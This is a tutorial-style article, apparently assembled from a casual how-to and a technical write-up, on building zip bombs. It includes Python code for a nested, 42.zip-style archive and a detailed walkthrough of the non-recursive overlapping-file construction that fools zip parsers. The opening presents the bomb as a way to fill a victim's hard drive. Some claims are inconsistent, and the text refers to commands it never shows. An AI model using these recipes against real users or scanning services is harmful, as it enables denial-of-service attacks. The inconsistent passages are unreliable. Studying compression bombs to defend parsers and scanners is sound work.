Thus we need to find the most efficient one among them! Comparing the sizes of the resulting compressed files (with ls, for example) makes the winner obvious. Now that we have an efficient method of creating zip files, we can create our zip bomb.
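As a rough illustration of the idea (the file names and the 10 MB size below are arbitrary choices, not the exact commands discussed above), a dummy file full of null bytes can be generated and compressed with Python's standard zipfile module:

```python
import zipfile

# Write 10 MB of null bytes to a dummy file (size chosen only for illustration).
with open("dummy.txt", "wb") as f:
    f.write(b"\0" * 10 * 1024 * 1024)

# Compress it with DEFLATE at the highest level; long runs of identical bytes
# compress extremely well, so the archive ends up only a few kilobytes.
with zipfile.ZipFile("dummy.zip", "w", zipfile.ZIP_DEFLATED, compresslevel=9) as z:
    z.write("dummy.txt")
```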
This compresses terabytes of data into a tiny file. Thus when someone tries to extract it, it expands to many times its compressed size and their hard drive is filled with null characters! No discussion of zip bombs is complete without the infamous 42.zip. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom-layer archive containing a 4.3-gigabyte file, for a total of roughly 4.5 petabytes of uncompressed data. The principle of zip bombs extends to many other areas; one well-known relative is the "billion laughs" XML bomb.
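A rough sketch of that recursive-nesting idea (the layer and copy counts mirror the 42.zip description above; the file names and the starting archive are made up):

```python
import shutil
import zipfile

# Start from a single highly compressed archive, e.g. the dummy.zip sketched earlier.
layer = "dummy.zip"

# Each layer packs 16 copies of the previous layer into a new archive,
# so five layers multiply the expanded size by 16**5 = 1,048,576.
for level in range(5):
    names = []
    for i in range(16):
        name = f"copy_{level}_{i}.zip"
        shutil.copyfile(layer, name)
        names.append(name)
    layer = f"layer_{level}.zip"
    with zipfile.ZipFile(layer, "w", zipfile.ZIP_DEFLATED) as z:
        for name in names:
            z.write(name)
```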
Basically it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.
We are going to build an exabyte zip bomb. Say you make an initial text file containing around 10 MB worth of zeros. Save it and close your text editor.
Go to the folder where your text file is stored and make around ten copies of it in the same folder. Now open a command prompt in that folder and run a command that concatenates all the copies into one file (see the sketch after the next paragraph). Better still, the command line can do this quickly without any lag, whereas text editors freeze up because they also have to deal with the user interface.
Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10 MB yields one 100 MB file; combine ten copies of that and you have a 1 GB text file full of zeros in just a few seconds. In a standard text file, every character needs 1 byte (8 bits) of storage.
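The original tutorial uses a shell copy command here that is not shown; this Python sketch reproduces the same idea (the starting file name is assumed):

```python
import shutil

# Start from the 10 MB file of zeros and repeatedly concatenate ten copies
# of the current file into a new one: 10 MB -> 100 MB -> 1 GB.
src = "zeros.txt"
for size_label in ("100mb", "1gb"):
    dst = f"zeros_{size_label}.txt"
    with open(dst, "wb") as out:
        for _ in range(10):
            with open(src, "rb") as f:
                shutil.copyfileobj(f, out)
    src = dst
```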
So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no. You could choose to fully unpack an archive that you knew had more archives within it, and older anti-virus scanners did exactly that, recursively unpacking every nested archive in order to scan the contents.
The zip bomb was actually a bomb for these applications. Even today, most common storage devices like the hard disk in your computer are pretty slow. So, it would take a good long while to write a large amount of data to the storage device.
Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it.
In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time.
Zip bombs often, if not always, rely on repetition of identical files to achieve their extreme compression ratios. Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than about 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer.
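The limit is easy to observe empirically. This small sketch (not from the original article) compresses ever longer runs of identical bytes with zlib and prints the ratio, which levels off a little above 1000:1:

```python
import zlib

# Compress runs of null bytes at the maximum level and watch the ratio
# flatten out near DEFLATE's ceiling of roughly 1032:1.
for mb in (1, 16, 64):
    data = b"\0" * (mb * 1024 * 1024)
    compressed = zlib.compress(data, 9)
    print(f"{mb:3d} MB -> {len(compressed):7d} bytes, ratio {len(data) / len(compressed):7.1f}")
```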
But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, is harmless if it is unzipped only one layer deep. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once. The construction described in the rest of this article is different: it is non-recursive, and it works by overlapping files inside the zip container, in order to reference a "kernel" of highly compressed data from multiple files, without making multiple copies of it.
The zip bomb's output size grows quadratically in the input size; i.e., the compression ratio gets better as the bomb gets bigger. The construction depends on features of both zip and DEFLATE; it is not directly portable to other file formats or compression algorithms. It is compatible with most zip parsers, the exceptions being "streaming" parsers that parse in one pass without first consulting the zip file's central directory.
We try to balance two conflicting goals: maximizing the compression ratio and remaining compatible with as many zip parsers as possible. A zip file consists of file entries followed by a central directory. The central directory is at the end of the zip file. It is a list of central directory headers. Each central directory header contains metadata for a single file, like its filename and CRC checksum, and a backwards pointer to a local file header.
A central directory header is 46 bytes long, plus the length of the filename. A file consists of a local file header followed by compressed file data. The local file header is 30 bytes long, plus the length of the filename.
It contains a redundant copy of the metadata from the central directory header, and the compressed and uncompressed sizes of the file data that follows. Zip is a container format, not a compression algorithm; the file data may be compressed with any of several algorithms, of which DEFLATE is by far the most common. This description of the zip format omits many details that are not needed for understanding the zip bomb. For full information, refer to section 4.3 of the zip specification, APPNOTE.TXT. The fixed-size parts of the two header types can be written down concretely, as in the sketch below.
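Here is a minimal sketch of the fixed-size portions of both record types using Python's struct module (field order per APPNOTE.TXT; this is not code from the original construction):

```python
import struct

# Local file header: signature, version needed, flags, method, mod time,
# mod date, CRC-32, compressed size, uncompressed size, name len, extra len.
LOCAL_FILE_HEADER = struct.Struct("<4s5H3I2H")

# Central directory header adds: version made by, comment len, disk number,
# internal attributes, external attributes, and the local file header offset.
CENTRAL_DIRECTORY_HEADER = struct.Struct("<4s6H3I5H2I")

# The fixed parts are 30 and 46 bytes; the variable-length filename follows each.
assert LOCAL_FILE_HEADER.size == 30
assert CENTRAL_DIRECTORY_HEADER.size == 46
```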
By compressing a long string of repeated bytes, we can produce a kernel of highly compressed data. By itself, the kernel's compression ratio cannot exceed the DEFLATE limit of 1032, so we want a way to reuse the kernel in many files without making a separate copy of it in each file. We can do that by overlapping files: making many central directory headers point to a single file, whose data is the kernel. Let's look at an example to see how this construction affects the compression ratio.
Suppose the kernel is 1000 bytes and decompresses to 1 MB. Then the first MB of output "costs" 1078 bytes of input: 31 bytes for a local file header (including a 1-byte filename), 47 bytes for a central directory header (including a 1-byte filename), and 1000 bytes for the kernel itself. But every 1 MB of output after the first costs only 47 bytes: we don't need another local file header or another copy of the kernel, only an additional central directory header. A bigger kernel raises the ceiling.
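A small sketch of how the compression ratio of this full-overlap layout grows with the number of files N (the figures are the illustrative assumptions above, not measured values):

```python
MB = 1024 * 1024

def full_overlap_ratio(n_files, kernel_in=1000, kernel_out=1 * MB,
                       lfh=31, cdh=47):
    """Compression ratio when n_files central directory headers all point
    at one local file header + kernel (1-byte filenames assumed)."""
    zip_size = lfh + kernel_in + n_files * cdh
    output_size = n_files * kernel_out
    return output_size / zip_size

for n in (1, 100, 10_000, 1_000_000):
    print(f"N = {n:>9,}: ratio ~ {full_overlap_ratio(n):,.0f}")
```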
The problem with this idea is a lack of compatibility. Because many central directory headers point to a single local file header, the metadata, specifically the filename, cannot match for every file. Some parsers balk at that. And the Python zipfile module throws a BadZipFile exception, complaining that the name in the central directory and the name in the local file header differ.
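For instance, a sketch of how that surfaces from Python's zipfile module (the archive name here is hypothetical; an overlapped zip would have to be built by hand first):

```python
import zipfile

# Try to read every member of a suspect archive. For an overlapped zip,
# the name stored in a member's local file header will not match the name
# in the central directory, and zipfile raises BadZipFile.
try:
    with zipfile.ZipFile("overlap.zip") as z:
        for info in z.infolist():
            z.read(info)
except zipfile.BadZipFile as exc:
    print("rejected:", exc)
```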
Next we will see how to modify the construction for consistency of filenames, while still retaining most of the advantage of overlapping files. We need to separate the local file headers for each file, while still reusing a single kernel. Simply concatenating all the local file headers does not work, because the zip parser will find a local file header where it expects to find the beginning of a DEFLATE stream.
But the idea will work, with a minor modification. Every local file header except the first will be interpreted in two ways: as code (part of the structure of the zip file) and as data (part of the contents of a file). The trick relies on a feature of the DEFLATE format: a DEFLATE stream is a sequence of blocks, and each block may be either compressed or non-compressed. Compressed blocks are what we usually think of; for example, the kernel is one big compressed block. But there are also non-compressed blocks, which start with a 5-byte header whose length field means simply, "output the next n bytes verbatim."
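A minimal sketch of what such a 5-byte non-compressed block header looks like, assuming the block starts on a byte boundary (illustration only, not the article's own code):

```python
import struct

def stored_block_header(n, final=False):
    """5-byte header of a DEFLATE non-compressed block: one byte whose low
    bit is BFINAL (BTYPE=00 means 'stored'), then LEN and its one's
    complement NLEN, both little-endian, so the next n bytes pass verbatim."""
    return struct.pack("<BHH", 1 if final else 0, n, n ^ 0xFFFF)

# Quote a 31-byte local file header: the decompressor copies it to the output.
header = stored_block_header(31)
assert len(header) == 5
```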
The output is the concatenation of the results of decompressing all the blocks in order. The "non-compressed" notion only has meaning at the DEFLATE layer; the file data still counts as "compressed" at the zip layer, no matter what kind of blocks are used. It is easiest to understand this quoted-overlap construction from the inside out, beginning with the last file and working backwards to the first. Start by inserting the kernel, which will form the end of file data for every file. Prepend a local file header LFH N and append a central directory header CDH N that points to it, setting the "compressed size" field in both to the compressed size of the kernel.
Now prepend a 5-byte non-compressed block header whose length field is equal to the size of LFH N, then prepend a second local file header LFH N-1 and append a second central directory header CDH N-1 that points to it. Set the "compressed size" metadata field in both of the new headers to the compressed size of the kernel, plus the size of the non-compressed block header (5 bytes), plus the size of LFH N. At this point the zip file contains two files, named "Y" and "Z".
Let's walk through what a zip parser would see while parsing it. Suppose the compressed size of the kernel is 1000 bytes and the size of LFH N is 31 bytes. Starting at the beginning, the parser finds the first file's local file header: its filename is "Y" and the compressed size of its file data is 1036 bytes (1000 + 5 + 31). Interpreting the next 1036 bytes as a DEFLATE stream, we first encounter the 5-byte header of a non-compressed block that says to copy the next 31 bytes verbatim; those 31 bytes are LFH N, and they are copied to the output. After that comes the compressed block containing the kernel, which decompresses in full.
Now we have reached the end of the compressed data and are done with file "Y". Advancing to the next local file header, the parser finds LFH N, with filename "Z" and a compressed size of 1000 bytes: the kernel alone, which again decompresses in full. Now we have reached the end of the final file and are done. The output file "Z" contains the decompressed kernel; the output file "Y" is the same, but additionally prefixed by the 31 bytes of LFH N. We complete the construction by repeating the quoting procedure until the zip file contains the desired number of files.
Each new file adds a central directory header, a local file header, and a non-compressed block to quote the immediately succeeding local file header. Compressed file data is generally a chain of DEFLATE non-compressed blocks (the quoted local file headers) followed by the compressed kernel. The output files are not all the same size: those that appear earlier in the zip file are larger than those that appear later, because they contain more quoted local file headers.
The contents of the output files are not particularly meaningful, but no one said they had to make sense. This quoted-overlap construction has better compatibility than the full-overlap construction of the previous section, but the compatibility comes at the expense of the compression ratio. There, each added file cost only a central directory header; here, it costs a central directory header, a local file header, and another 5 bytes for the quoting header.
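Continuing with the earlier example figures (still illustrative assumptions), the per-file cost of the two layouts can be compared directly:

```python
MB = 1024 * 1024

def quoted_overlap_ratio(n_files, kernel_in=1000, kernel_out=1 * MB,
                         lfh=31, cdh=47, quote=5):
    """Each file after the first adds an LFH, a CDH and a 5-byte quoting
    header (83 bytes total) instead of the 47 bytes of the full overlap."""
    zip_size = lfh + kernel_in + cdh + (n_files - 1) * (lfh + quote + cdh)
    # Every output file contains the kernel; earlier files also contain the
    # quoted local file headers of all later files (treated as 31 bytes each).
    output_size = n_files * kernel_out + (n_files * (n_files - 1) // 2) * lfh
    return output_size / zip_size

for n in (100, 10_000, 1_000_000):
    print(f"N = {n:>9,}: ratio ~ {quoted_overlap_ratio(n):,.0f}")
```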
Now that we have the basic zip bomb construction, we will try to make it as efficient as possible. We want to answer two questions: how densely can the kernel and filenames be packed, and how should a given file-size budget be split between the kernel and the headers that reference it? It pays to compress the kernel as densely as possible, because every decompressed byte gets magnified by a factor of N. All decent DEFLATE compressors will approach a compression ratio of 1032 when given an infinite stream of repeating bytes, but we care more about specific finite sizes than asymptotics.
For our purposes, filenames are mostly dead weight. While filenames do contribute something to the output size by virtue of being part of quoted local file headers, a byte in a filename does not contribute nearly as much as a byte in the kernel. We want filenames to be as short as possible, while keeping them all distinct, and subject to compatibility considerations.
The first compatibility consideration is character encoding. The zip format specification states that filenames are to be interpreted as CP 437, or as UTF-8 if a certain flag bit is set (APPNOTE.TXT Appendix D). But this is a major point of incompatibility across zip parsers, which may interpret filenames as being in some fixed or locale-specific encoding. We are further restricted by filesystem naming limitations. Some filesystems are case-insensitive, so "a" and "A" do not count as distinct names. As a safe but not necessarily optimal compromise, our zip bomb will use filenames consisting of characters drawn from a 36-character alphabet (digits and uppercase letters) that does not rely on case distinctions or use special characters.
Filenames are generated in the obvious way, cycling each position through the possible characters and adding a position on overflow, as in the sketch below. There are 36 filenames of length 1, 36² filenames of length 2, and so on.
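A minimal sketch of that generation order (the alphabet here is the assumed digits-plus-uppercase set from above):

```python
import itertools

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"  # assumed 36-character set

def filenames():
    """Yield '0', '1', ..., 'Z', '00', '01', ...: all length-1 names,
    then all length-2 names, and so on."""
    for length in itertools.count(1):
        for chars in itertools.product(ALPHABET, repeat=length):
            yield "".join(chars)

# First few names:
print(list(itertools.islice(filenames(), 40)))
```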
Given that the N filenames in the zip file are generally not all of the same length, which way should we order them, shortest to longest or longest to shortest? A little reflection shows that it is better to put the longest names last, because those names are the most quoted. Ordering filenames longest last adds extra megabytes of output to zblg.zip, but it is a minor optimization, as the extra output makes up only a tiny fraction of the total.
The quoted-overlap construction allows us to place a compressed kernel of data, and then cheaply copy it many times. For a given zip file size X, how much space should we devote to storing the kernel, and how much to making copies?
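The section breaks off here, but a rough back-of-the-envelope model (my own simplification, using the illustrative per-file costs from earlier, not the article's full analysis) suggests the shape of the answer: if the kernel takes k bytes and each copy costs about 83 bytes of headers, the output is proportional to k·(X − k), which is maximized near k = X/2.

```python
def modeled_output(total_size, kernel_bytes, per_copy=83, deflate_ratio=1032):
    """Very rough model: the kernel decompresses to ~1032x its size and is
    replayed once per file; header and filename overhead is folded into a
    flat per-copy cost. Quoted-header output and the kernel's own headers
    are ignored, so this only shows the shape of the trade-off."""
    copies = (total_size - kernel_bytes) // per_copy
    return copies * kernel_bytes * deflate_ratio

X = 42_000  # arbitrary total size for illustration
best = max(range(1_000, X, 1_000), key=lambda k: modeled_output(X, k))
print("best kernel size under this model:", best, "of", X, "bytes")
```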